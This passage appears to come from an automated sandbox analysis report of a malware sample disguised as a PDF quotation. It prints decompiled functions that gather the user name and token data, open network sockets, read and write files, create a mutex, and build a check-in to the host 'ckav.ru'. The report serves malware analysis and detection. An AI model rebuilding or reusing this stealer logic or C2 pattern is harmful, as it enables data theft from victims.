				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}

0x00406077
0x00406082
0x00406085

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

0x004061c3
0x004061cb
0x004061cd
0x004061d0
0x004061de
0x004061e0
0x004061e5
0x004061e9
0x004061eb
0x004061ed
0x004061f2
0x0040622a
0x00406230
0x00406235
0x00406239
0x0040623b
0x00406244
0x00406249
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00406261
0x00406266
0x00406266
0x00406270
0x00406273
0x00406276
0x0040627b
0x0040627e
0x0040628c
0x0040628e
0x00406290
0x00406295
0x0040629a
0x0040629e
0x004062a0
0x004062ac
0x004062af
0x004062b7
0x004062b9
0x004062c9
0x004062e0
0x004062e2
0x004062e4
0x004062f3
0x004062f3
0x004062e4
0x004062f8
0x004062fd
0x004062a0
0x004062fe
0x00406302
0x00406307
0x0040630c
0x0040630d
0x0040630f
0x00406312
0x00406317
0x00406318
0x0040631c
0x0040631e
0x00406321
0x00406326
0x00000000
0x00406327
0x004061f4
0x004061ff
0x00406208
0x00406218
0x0040621d
0x00406224
0x00406226
0x00406228
0x00000000
0x00000000
0x00000000
0x00406228
0x00406201
0x00000000

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

0x00404e1d
0x00404e26
0x00404e2a
0x00404e2f
0x00404e37
0x00404e3a
0x00404e45
0x00404e4f
0x00404e57
0x00404e61
0x00404e66
0x00404e68
0x00404e6c
0x00404e6e
0x00404e7a
0x00404e80
0x00404e84
0x00404e9f
0x00404ea7
0x00404eab
0x00404eb1
0x00404eb1
0x00404eb6
0x00404ebe
0x00404ecb
0x00000000
0x00404ec0
0x00404ec1
0x00404ec7
0x00404ec7
0x00404ecd
0x00000000
0x00404ece
0x00404ebe
0x00404e87
0x00404e90
0x00000000
0x00404e90
0x00000000

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}

0x004040c4
0x004040ce
0x004040d0
0x004040e8
0x004040ea
0x004040ec
0x004040f2
0x0040418d
0x00404190
0x00404184
0x00000000
0x00404184
0x004041a0
0x004041a5
0x004041a7
0x00000000
0x00000000
0x004041a9
0x004041b6
0x004041b8
0x004041be
0x004041cb
0x004041d0
0x004041d1
0x004041d3
0x004041d8
0x004041dc
0x00000000
0x004041e2
0x00404100
0x0040410c
0x00404111
0x0040417a
0x0040417a
0x00000000
0x0040411b
0x0040411b
0x00404120
0x00404122
0x00404122
0x0040412c
0x0040413a
0x0040413c
0x00404140
0x00000000
0x00404142
0x0040414a
0x00404155
0x0040415a
0x0040415e
0x00404168
0x00404174
0x00404176
0x00404176
0x0040417d
0x0040417e
0x00000000
0x00404183
0x00404140

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}

0x0041386f
0x0041387e
0x00413885
0x00413889
0x0041388c
0x00413890
0x00413893
0x00413897
0x0041389a
0x0041389e
0x004138a1
0x004138a5
0x004138a8
0x004138ac
0x004138af
0x004138b2
0x004138b5
0x004138b8
0x004138bb
0x004138bc
0x004138c4
0x004138c8
0x004138cb
0x004138cf
0x004138d2
0x004138d6
0x004138d7
0x004138df
0x004138e3
0x004138e4
0x004138ea
0x004138eb
0x004138f1
0x004138f5
0x004138f9
0x004138fd
0x00413901
0x00413905
0x00413909
0x0041390d
0x00413911
0x00413915
0x00413919
0x0041391d
0x00413921
0x00413925
0x00413929
0x0041392d
0x00413931
0x00413935
0x00413939
0x0041393d
0x00413941
0x00413950
0x00413959
0x0041395f
0x00413968
0x0041396e
0x00413973
0x00413977
0x00413979
0x00413980
0x00413982
0x00413991
0x0041399c
0x0041399e
0x004139a4
0x004139a9
0x004139ac
0x004139b1
0x004139b1
0x004139b2
0x004139b7
0x004139bc
0x004139c1
0x004139c7
0x004139cd
0x004139cd
0x004139db

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}

0x004042cf
0x004042d5
0x004042df
0x004042e2
0x004042f9
0x004042fb
0x00404300
0x0040430a
0x00404314
0x00404319
0x00404323
0x00404334
0x0040433b
0x0040433b
0x0040433f
0x00404344
0x0040434c

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178
threadCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}

0x00412d31
0x00412d34
0x00412d39
0x00412d3c
0x00412d49
0x00412d50
0x00412d52
0x00412f24
0x00412f24
0x00412f2b
0x00412f30
0x00412f32
0x00412f37
0x00412f41
0x00412f53
0x00412f53
0x00412f5b
0x00412f60
0x00412d58
0x00412d58
0x00412d63
0x00412d6c
0x00412d73
0x00412d7e
0x00412d7f
0x00412d80
0x00412d81
0x00412d82
0x00412d8f
0x00412da1
0x00412da6
0x00412dae
0x00412db0
0x00412db1
0x00412db5
0x00412dce
0x00412dcf
0x00412dd5
0x00412dda
0x00412db7
0x00412db7
0x00412db8
0x00412dbe
0x00412dc4
0x00412dc9
0x00412dc9
0x00412de2
0x00412de4
0x00412de5
0x00412de7
0x00412de9
0x00412e02
0x00412e03
0x00412e09
0x00412e0e
0x00412deb
0x00412deb
0x00412dec
0x00412df2
0x00412df8
0x00412dfd
0x00412dfd
0x00412e11
0x00412e17
0x00412e19
0x00412e1a
0x00412e1e
0x00412e37
0x00412e38
0x00412e3e
0x00412e43
0x00412e20
0x00412e20
0x00412e21
0x00412e27
0x00412e2d
0x00412e32
0x00412e32
0x00412e4b
0x00412e4d
0x00412e4f
0x00412e7e
0x00412e8a
0x00412e8f
0x00412e51
0x00412e59
0x00412e67
0x00412e6d
0x00412e72
0x00412e72
0x00412e9e
0x00412eaf
0x00412eb4
0x00412ec0
0x00412ece
0x00412edc
0x00412eea
0x00412ef8
0x00412f0f
0x00412f14
0x00412f14
0x00412f17
0x00412f1d
0x00412f1f
0x00000000
0x00412f1f
0x00412f74

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040632F() {
				char _v8;
				void* _t4;
